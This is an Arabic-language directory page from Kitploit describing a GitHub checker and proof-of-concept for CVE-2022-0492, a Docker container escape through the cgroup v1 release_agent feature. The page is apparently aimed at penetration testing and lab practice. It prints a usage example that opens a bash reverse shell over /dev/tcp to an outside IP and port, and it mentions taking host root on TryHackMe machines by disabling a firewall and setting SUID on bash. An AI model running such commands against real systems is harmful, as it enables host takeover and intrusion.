Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-0492-Docker-Breakout-Checker-and-PoC — مدقق اختراق Docker و PoC عبر CAP_SYS_ADMIN وعبر user namespaces (CVE-2022-0492) | Kitploit
أدوات/GitHubGitHub/t1erno/cve-2022-0492-docker-breakout-checker-and-poc
تصعيد الامتيازاتأمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن السحابةالتعلم والتعليمالهروب من الحاويةمختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubt1erno/cve-2022-0492-docker-breakout-checker-and-poc

CVE-2022-0492-Docker-Breakout-Checker-and-PoC

مدقق اختراق Docker و PoC عبر CAP_SYS_ADMIN وعبر user namespaces (CVE-2022-0492)

عرض المستودع
81منذ 3 سنواتلم تتم المراجعة بعد

CVE-2022-0492 مدقق ومثال هروب Docker

ملخص

يتطلب استغلال الثغرة أن يكون لدى المهاجم إمكانية الوصول إلى حاوية Docker تعمل على نظام قابل للاستغلال. بمجرد استغلالها، يمكن للمهاجم الهروب من الحاوية والحصول على سيطرة كاملة على النظام المضيف.

تم العثور على ثغرة في دالة cgroup_release_agent_write في ملف kernel/cgroup/cgroup-v1.c في نواة لينكس. يسمح هذا الخلل، في ظل ظروف معينة، باستخدام ميزة release_agent لـ cgroups الإصدار 1 لتصعيد الامتيازات وتجاوز عزل مساحات الأسماء بشكل غير متوقع.

بشكل أبسط، تحتوي cgroups الإصدار 1 على ميزة تسمى release_agent تقوم بتشغيل برنامج عند إنهاء عملية في المجموعة. إذا تم تمكين notify_on_release، تقوم النواة بتشغيل الملف الثنائي release_agent كجذر. من خلال تحرير ملف release_agent، يمكن للمهاجم تنفيذ ملفه الثنائي الخاص بامتيازات مرتفعة، والاستيلاء على النظام. ومع ذلك، فإن ملف release_agent مملوك للجذر، لذا لا يمكن تعديله إلا لمستخدم لديه صلاحيات الجذر.

الاستخدام

root@kitploit:~
# sh CVE-2022-0492.sh

[>] CVE-2022-0492 Docker Container Escape                                           V
[>] Execute this script in a Docker to check for vulnerability or to exploit it. (º___\/{
[>] Usage:
        sh CVE-2022-0492.sh    --checker                Verify if system is vulnerable.
        sh CVE-2022-0492.sh -c|--command <COMMAND>      Execute command on host machine.
        sh CVE-2022-0492.sh -h|--help                   Print the help panel.

[>] Example:
        sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'

أمثلة

هامليت من TryHackMe

تم اختراق المستخدم الجذر في الجهاز المضيف عن طريق تعطيل UFW ثم إرسال شل عكسي.

أشباح مضللة من TryHackMe

تم اختراق المستخدم الجذر في الجهاز المضيف عن طريق تعيين SUID إلى bash، وكذلك إرسال شل عكسي.

المصادر:

  • https://github.com/puckiestyle/CVE-2022-0492
  • http://mon0dy.top/2022/04/16/%E8%BF%91%E6%9C%9FLinux%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%20exp%E6%B1%87%E6%80%BB/#cve-2022-0492
تنزيل الأداة